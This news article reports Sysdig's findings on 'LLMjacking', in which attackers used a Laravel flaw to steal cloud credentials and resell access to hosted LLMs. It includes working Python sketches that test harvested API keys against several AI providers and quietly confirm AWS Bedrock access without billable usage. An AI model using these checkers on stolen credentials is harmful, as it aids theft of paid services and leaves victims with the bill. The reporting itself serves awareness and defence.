Using cloud-hosted large language models (LLMs) can be quite expensive, which is why hackers have apparently started stealing and selling login credentials for the tools.
Cybersecurity researchers from the Sysdig Threat Research Team recently detected one such campaign, which they named LLMjacking.
In its report, Sysdig said it observed a threat actor exploiting a vulnerability in the Laravel Framework, tracked as CVE-2021-3129. The flaw allowed them to access the network and scan it for Amazon Web Services (AWS) credentials with access to LLM services.
New methods of abuse
“Once they gained initial access, they extracted cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers,” the researchers explained in the report. “In this case, the target was a local Claude LLM model (v2/v3) from Anthropic.”
The researchers also discovered the tools the attackers used to generate the requests that invoked the models. Among them was a Python script that checked credentials for ten AI services and determined which of them were usable. The services include AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI.
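Sysdig has not published the script itself, but a minimal sketch of the idea might look like the following, assuming hypothetical harvested keys and using each provider's lightweight "list models" endpoint to test a key without generating any text (the key values and the exact endpoint set are illustrative assumptions, not the attacker's actual code):

```python
"""Illustrative sketch only: probing harvested API keys against cheap
authenticated endpoints, in the spirit of the checker Sysdig describes.
Key values and the endpoint set are assumptions for illustration."""
import requests

# Hypothetical harvested credentials to test.
CANDIDATE_KEYS = {
    "openai": "sk-...redacted...",
    "mistral": "...redacted...",
}

# "List models" endpoints validate a key without generating text,
# and therefore without burning tokens or showing up as usage.
CHECK_ENDPOINTS = {
    "openai": "https://api.openai.com/v1/models",
    "mistral": "https://api.mistral.ai/v1/models",
}

def check_key(service: str, key: str) -> bool:
    """Return True if the key authenticates against the service."""
    resp = requests.get(
        CHECK_ENDPOINTS[service],
        headers={"Authorization": f"Bearer {key}"},
        timeout=10,
    )
    return resp.status_code == 200

for service, key in CANDIDATE_KEYS.items():
    status = "usable" if check_key(service, key) else "invalid/blocked"
    print(f"{service}: {status}")
```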
They also found that the attackers did not run any legitimate LLM queries during the verification stage; instead, they did “just enough” to figure out what the credentials and quotas were capable of.
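To illustrate how such a low-footprint probe can work, here is a sketch against AWS Bedrock using boto3. The model ID and the deliberately invalid max_tokens_to_sample value are illustrative choices: a request that fails parameter validation proves the credentials are authenticated and can reach the model, without ever completing a billable generation.

```python
"""Illustrative sketch: a 'just enough' credential check against AWS
Bedrock. A deliberately malformed request distinguishes working
credentials (ValidationException) from dead ones (access or auth
errors) without running a real, billable completion."""
import json
import boto3
from botocore.exceptions import ClientError

client = boto3.client("bedrock-runtime", region_name="us-east-1")

def credentials_can_invoke(model_id: str = "anthropic.claude-v2") -> bool:
    try:
        client.invoke_model(
            modelId=model_id,
            body=json.dumps({
                "prompt": "\n\nHuman: hi\n\nAssistant:",
                "max_tokens_to_sample": -1,  # invalid on purpose
            }),
        )
    except ClientError as err:
        code = err.response["Error"]["Code"]
        # A validation error means the request authenticated and
        # reached the model; only the bogus parameter was rejected.
        return code == "ValidationException"
    return True  # should not happen with the invalid parameter

print("usable" if credentials_can_invoke() else "invalid or blocked")
```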
In its coverage of the findings, The Hacker News says they are evidence that hackers are finding new ways to weaponize LLMs, beyond the usual prompt injection and model poisoning attacks: by monetizing access to the models while the bill goes to the victim.
That bill, the researchers stressed, could be substantial, reaching as much as $46,000 per day for LLM use.
“Using LLM services can be expensive, depending on the model and the number of tokens supplied to it,” the researchers added. “By maximizing quota limits, attackers can also prevent the compromised organization from legitimately using models, disrupting business operations.”
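For a sense of scale, a back-of-envelope calculation shows how sustained abuse of a large model lands in that range. The per-token rates and the usage pattern below are assumptions for illustration, not any provider's actual price list:

```python
# Back-of-envelope cost estimate; rates and traffic are illustrative
# placeholders, not any provider's actual price list.
INPUT_RATE = 8.00 / 1_000_000    # assumed $ per input token
OUTPUT_RATE = 24.00 / 1_000_000  # assumed $ per output token

# Assume the attacker keeps the model saturated around the clock:
# one large request every second, all day.
requests_per_day = 86_400
input_tokens = 50_000   # per request
output_tokens = 4_000   # per request

per_request = input_tokens * INPUT_RATE + output_tokens * OUTPUT_RATE
per_day = per_request * requests_per_day
print(f"~${per_day:,.0f} per day")  # ~$42,854 with these assumptions
```

Even with these rough assumptions, a single set of stolen credentials driven at full tilt produces a daily bill in the same ballpark as Sysdig's $46,000 estimate.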